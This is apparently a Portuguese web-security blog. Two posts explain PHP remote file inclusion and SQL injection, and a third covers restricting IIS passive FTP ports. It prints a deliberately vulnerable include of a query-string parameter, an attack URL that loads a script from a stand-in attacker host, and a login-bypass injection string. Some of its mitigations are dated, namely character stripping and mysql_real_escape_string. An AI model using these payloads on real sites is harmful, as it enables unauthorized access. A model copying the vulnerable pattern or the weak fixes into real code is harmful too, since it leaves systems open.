Segurança para sites – Parte II

Neste post vamos falar sobre uma falha de segurança no desenvolvimento de sites que também é muito explorada. O php include.

Isto é mais um descuido do programador do que uma falha de segurança. O problema ocorre quando o desenvolvedor abre includes no seu site vindo através de querystring.

Exemplo:

http://www.site.com.br/index.php?arquivo=empresa.php

A página index.php tem um include que abre o arquivo que vem no paramêtro “arquivo” da querystring.

Exemplo do arquivo index.php:

<? php
include($_GET[arquivo]);
?>
O problema está aí. O arquivo index.php inclui para ser processado qualquer arquivo que vier através da querystring do php. O invasor pode, então, criar um script php malicioso e passá-lo como parâmetro, para que seja carregado e executado pelo site vítima.

Veja o exemplo:

http://www.site.com.br/index.php?arquivo=http://www.sitedohacker.com.br/hacker.txt

No link acima, o script index.php irá carregar e executar o script hacker.txt, que contém dados php e está dentro do site do invasor. Observe que o script não será executado no site do invasor, e sim no site da vítima. Um exemplo do que este script pode fazer é apagar todos os arquivos do cliente, conectar no banco de dados e descobrir senhas de acesso ao sistema, etc.

A solução para este problema é simples, você deverá checar sempre, no arquivo index.php, se o script que você está abrindo é um script autorizado, dentro de um servidor autorizado. Outra solução que pode ser adotada, e é considera melhor que a anterior, é realmente evitar incluir arquivos que são passados por querystring. Desta maneira você estará 100% livre deste problema.

Segurança para sites – Parte I

Quando se planeja o desenvolvimento de um site, uma preocupação que deve ser levado em conta é a segurança.

É comum vemos sites serem “hackeados” através de falhas no próprio site. Vamos escrever uma série de artigos falando das falhas mais comuns e do que podemos fazer para evitá-las.

No primeiro artigo iremos falar sobre um dos problemas mais comuns: SQL-INJECTION.

Funcionamento

Este ataque é feito inserindo dados através de formulário que, ao serem processados, interrompam a instrução sql original e executa outra, enviada pelo invasor. Geralmente é utilizado para conseguir logar na área administrativa de um determinado site sem que se tenha as credenciais necessárias.

Veja um exemplo de string que pode ser enviada através de formulários para tentar se autenticar:

Imagine um script asp autenticando um usuário da seguinte maneira:

Select * from ADM where login=’” & request.form(“login”) & “‘”

Agora imagine que o invasor digite, no campo login do formulário o seguinte:

hi’ or ‘a’='a

O resultado desta sql será:

Select * from ADM where login=’hi’ or ‘a’='a‘

Isto irá retornar verdadeiro, e o usuário logará no sistema sem saber o login.

Como evitar

Você deve filtrar os campos que vem do formulário, removendo os caracteres que permitem ao invasor interromper o seu comando SQL e executar o dele.

Basta tratar os dados que vem do formulário, removendo os caracteres:

(;) , (') e (--).

Esta remoção pode ser realizada com função replace do asp, ou equivalente em outras linguagens. Em php você pode utilizar a função mysql_real_escape_string.

Uma observação que deve ser levado em conta é que todo e qualquer dado de formulário deve ser filtrado, não apenas os campos referente a login e senha. Inclusive dados vindo de checkbox e radio buttons, pois o invasor pode gerar outro html modificando estes campos e utilizando-os para a invasão.

Outra observação importante é filtrar estes dados sempre do lado do servidor. Mesmo que você valide os dados em javascript, nada impede do invasor desabilitar o javascript da máquina, e assim enviar os dados para o servidor. A validação do lado do servidor é necessária.

Restringir Portas de ftp passivo no IIS

O ftp passivo escolhe aleatóriamente uma porta para a conexão entre o servidor web e o computador do cliente. Quando estamos configurando um firewall, precisamos restringir a faixa destas portas, já que precisamos liberá-las no firewall.

No IIS 6.0, siga estes passos para restringir as portas:
(suponhamos que você queira liberar as portas entre 5500 a 5700)

Passo 1: Habilite Direct Metabase Edit

1. Abra o IIS Microsoft Management Console (MMC).
2. Clique com o botão direito em Local Computer.
3. Selecione Properties.
4. Marque a opção Enable Direct Metabase Edit.

Passo 2: Configure a faixa de portas através do scrpit ADSUTIL

1. Clique Start -> Run, digite “cmd” e clique OK.
2. Digite “cd Inetpub\AdminScripts” e tecle ENTER.
3. Digite o seguinte comando no prompt.
cscript adsutil.vbs set /MSFTPSVC/PassivePortRange “5500-5700″
4. Reinicie o serviço FTP.

Você verá a seguinte saída após configurar através do script ADSUTIL

Microsoft (R) Windows Script Host Version 5.6

Copyright (C) Microsoft Corporation 1996-2001. All rights reserved.

PassivePortRange : (STRING) “5500-5700″